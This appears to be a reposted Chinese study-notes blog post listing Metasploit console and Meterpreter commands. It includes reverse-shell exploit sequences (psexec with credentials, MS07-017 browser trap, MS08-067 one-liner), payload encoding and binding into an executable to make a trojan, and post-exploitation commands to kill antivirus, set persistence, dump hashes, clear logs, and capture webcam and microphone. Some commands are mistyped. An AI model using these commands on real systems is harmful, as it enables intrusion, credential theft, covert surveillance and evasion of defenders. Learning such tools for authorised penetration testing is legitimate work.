MSF(二):msf外部/内部常用命令
生活随笔
收集整理的這篇文章主要介紹了
MSF(二):msf外部/内部常用命令
小編覺得挺不錯的,現在分享給大家,幫大家做個參考.
msf外內部常用命令
安全牛學習Metasploit Framework筆記
1、msf外部命令
- msfconsole -h/-q/-r/-v/exit
msf的幫助信息/安靜啟動,沒有banner/使用msfconsole自動化執行rc文件里的內容/msf版本/退出msf - help/?/help xxx
幫助信息/幫助信息/查看具體名稱的幫助i信息 - service postgresql start
啟動數據庫
2、msf內部基本命令
(1)基本命令
- resource xx.rc
在msf內部自動化執行該文件,rc是資源文件的標準擴展名,msfconsole -r xx.rc是一樣的效果,只不過msfconsole需要先打開msf控制臺,再執行xx.rc資源文件 - banner/color/connect -h
msf標語,簡單介紹/color true or false or auto/類似nc - show auxiliary / exploits / payloads / encoders / nops/post
輔助模塊/攻擊代碼/攻擊載荷/編碼/payload的穩定與維持大小/后滲透 - search xxx / help search
搜索xxx利用攻擊模塊/search查詢幫助 - search name:mysql/search name:mysql type:auxiliary
單條件搜索/多條件搜索 - use dos/windows/smb/ms09_001_write
使用攻擊模塊
進入攻擊模塊后:show options / payloads / targets / advanced / evasion/missing
顯示配置信息/顯示適用于當前exploit利用模塊的payloads,并不顯示全部/指定目標系統,一般都會選擇,系統默認的攻擊成功率不高/顯示高級參數配置/作逃避,繞過的配置/顯示哪個參數必須設置的但還沒有設置的 - info/edit
獲取模塊的基本信息/編輯當前exploit模塊的代碼 - Check /back
配置完成后,在exploit之前判斷目標ip漏洞是否存在,并不是所有exploit模塊存在check,只有少數/返回上一層,類似linux中的cd ..,但無法退出msf,退出使用exit - db_status / db_rebuild_cache/db_disconnect/db_connect/db_nmap
數據庫連接信息/MSF所有的模塊都保存在/usr/share/metasploit-framework/modules/,因為在msf內部使用文件搜索較慢,所以將所有模塊緩存到msf的數據庫里,那么搜索的速度就會變快,目的:啟動一個任務,在msf數據庫中,創建一個所有模塊的cache,提高搜索速度/斷開msf和當前數據庫的連接/連接指定數據庫連接的配置文件,例:db_connect -y /usr/share/metasploit-framework/config/database.yml,還有不懂得可以db_connect -h查看相關配置信息/集成在msf中的nmap,和外部的nmap使用和效果一樣,唯一不同的就是,msf中的nmap掃描結果會自動保存在msf數據庫中 - hosts / hosts 1.1.1.1 / hosts -u / hosts -c address,os_flavor -S Linux
查看當前數據庫中已掃描到的主機信息/查看指定IP的主機信息/查看哪些主機是開機up狀態/查看指定列的信息/搜索包含指定字符串的內容 - services/services -p 80 / services -c info,name -p 1-1000 192.168.100.141
顯示已掃描到主機的端口信息/搜索指定已掃描主機開放的指定端口/搜索指定列、端口、IP的信息 - vulns / creds (mysql_login) / loot (hashdump)
查看已經攻擊成功的漏洞信息/顯示攻擊成功時的服務的賬號和密碼信息/hash值的破解 - db_import /xx/xx/xx.xml/ db_export -f xml /xx/xx/xx.xml
數據庫導入/數據庫導出 - set / unset / setg / unsetg / save
設置參數/取消設置的參數/全局設置參數,只要有模塊里有該參數,值都為我們之前已經全局設置的/取消全局變量的設置/保存當前msf會話內的配置,退出后重新登陸msf配置依舊存在,如果想恢復初始的樣子,那就刪掉這個保存的配置文件,重啟msfconsole - run / exploit/exploit -j
兩個命令一樣的,auxiliary模塊常用run,exploits模塊常用exploit,這是建議,實際用哪個都一樣/拿到shell不會立馬進入shell,以后臺的進程存在 - jobs/ kill 0
在后臺運行的job/kill id值 - load / unload loadpath
調入插件,連接外部的插件/關閉調用外部插件/眾所周知,msf的所有模塊都在/sur/share/metasploit-framework/modules下,loadpath可以調用其它指定目錄里的模塊,比如自己開發或編寫的模塊 - sessions or sessions-I/sessions -i (Shell 、Meterpreter session、VNC)
獲得的shell連接會話,已經建立的session//進入指定id的session - route通過指定session路由流量
指定一個session,以后朝向對方內網的流量,都通過這個session id建立的連接,進行流量轉發,相當于這個session id就是中轉站 - irb (Framework::Version)
進入msf的內部開發模式,可以執行一些內部函數,也可以開發自己的模塊等等
(2)Exploit模塊
- Active exploit(主動攻擊,主要是服務端的漏洞,將payload發送給目標服務端偵聽的端口)這個就是我們直接攻擊,不開防火墻可以,開了不行
use exploit/windows/smb/psexec
該模塊是在遠程目標系統上執行程序
set RHOST192.168.1.100
set PAYLOAD windows/shell/reverse_tcp
set LHOST 192. 168.1.1
set LPORT 4444
set SMBUSER user1
set SMBPASS pass1
exploit - Passive Exploits(被動攻擊,主要是客戶端的程序)這個就是我們設陷阱,等目標上鉤,這個可以針對開了防火墻的,配合社會工程學
use exploit/windows/browser/ms07_017_ani loadimage_chunksize
set URIPATH /
set PAYLOAD windows/shel/reverse tcp
set LHOST 192. 168.1.1
set LPORT 4444
exploit
(3)生成payload
use payload/windows/shell bind_ tcp
(4)使用payload
- generate(壞字符)
使用generate生成一個payload - generate -b '\x00'/generate -b '\x00\x44\x67\x66\xfalx01\xe0\x44\x67\xa1\xa2\xa3x75\x4b'/generate -b \'x00\x44\x67\x66\lxfa\x01\xe0\x44\x67xa1xa2lxa3\x75\x4b\xFF\x0a\x0b\x01\xcc\6e\x1e\x2e\x26'
msf自動選擇編碼模塊繞過壞字符,避免在shellcode中出現的壞字符,常用過濾的是\x00、\xff,都是使用encoder過濾引號中的壞字符
show encoders / generate -e x86/nonalpha
顯示編碼類型/手動指定編碼模塊
generate -b \x00' -t exe -e x86/shikata_ga_ nai -i 5 -k -x /usr/share/windows-binaries/radmin.exe -f /root/1.exe
-b過濾encoser壞字符,-t指定輸出格式,可為c、exe等等,-e指定encoder類型,-i使用編碼的次數,多輪編碼,-k不產生新的進程,只產生新的線程,更隱蔽,-x將payload和指定模板綁定在一起,-f輸出指定文件。注:最后可利用文件為1.exe - NOP=no-operation=Next Operation (無任何操作)
當CPU執行到NOP,就順則會往下滑,滑到有操作的位置,EIP返回到存儲NOP sled的任意地址時將遞增,最終導致shellcode執行,例:generate -s 14,在payload前面加14位NOP
3、meterpreter基本命令
- Help/background
幫助信息/從seesion中退出,但保存session的連接 - run/bgrun killav/bgrun persistence/bgrun hashdump/bgrun vnc/sound_recorder/webcam/winbf
前臺運行指定命令/后臺與運行,關閉殺毒軟件/建立持久連接,將shellcode寫入系統文件,開機自啟/開啟圖形化遠程管理/錄制聲音/開啟攝像頭/讓肉雞幫忙暴力破解密碼,利用肉雞資源 - cd/ls/cat/pwd/dir/mkdir/mv/rm/rmdir/edit/可以使用linux命令
進入/顯示文件/查看/顯示當前路徑/顯示文件/創建目錄/移動/刪除/刪除目錄/編輯 - lpwd/lcd 本地目錄
local當前的工作目錄,就是在kali上的我們使用的工作目錄/進入我們本地目錄 - clearev/download/upload /usr/share/windows binaries/nc.exe c:\\windows\\system32
刪除目標系統日志/下載文件到本地/上傳本地文件到目標系統
注:因為\在linux中有轉義符的含義,所以執行linux命令時要用兩個\表示目標windows的\ - win+r eventvwr
windows日志查看 - execute -f cmd.exe -i -H
-f執行目標系統里的哪個程序,-i和執行的這個程序進行交互,-H將這個程序窗口隱藏起來執行 - getuid/getsystem/getprivs/getproxy/getpid/migrate
以哪個用戶賬號登陸到目標系統的/強制獲取成system賬號,獲得系統權限/查看當前用戶權限/獲取目標系統代理信息/查看當前shellcode的線程在目標系統哪個進程當中/遷移線程到其它進程中 - hashdump/run post/windows/gather/hashdump
系統賬號哈希值/系統賬號哈希值 - sysinfo/ps/kill/reboot/shutdown/shell
目標系統信息/查看進程/查殺進程/重啟/關閉/獲得一個目標操作系統的shell,退出到meterpreter用exit - show_mount/search -f autoexec.bat
當前掛載了幾個系統分區/搜索目標系統中的文件 - arp/netstat/ipconfig/ifconfig/route
查看目標機器的arp緩存/查看目標端口連接/ip地址/ip地址/查看目標路由表 - idletime/resource
查看目標操作系統空閑時間/調用外部的資源文件,自動化執行 - record_mic/webcam_list/webcam_snap -i 1 -v false
記錄目標麥克風的聲音/列出目標系統上所有的攝像頭/每隔一秒鐘用攝像頭拍照一次
4、meterpreter python 擴展
(1)2015年11月份,來自社區的貢獻
無需運行環境,在客戶端運行原生python代碼
就是不需要編譯python,目標系統沒有python解釋器,也可以執行
使用示例:
(2)msfcli
201 5年6月已經被取消,由msfconsole -x取代,編寫腳本時便于引用
msfconsole -x "use exploit/windows/smb/ms08_ 067 netapi; set RHOST 1.1.1.1; set PAYLOAD windows/meterpreter/reverse_ tcp; set LHOST 1.1.1 .8; set LPORT 5555; set target 34;exploit"
總結
以上是生活随笔為你收集整理的MSF(二):msf外部/内部常用命令的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: 耳机airpro是啥牌子
- 下一篇: MSF(三):信息收集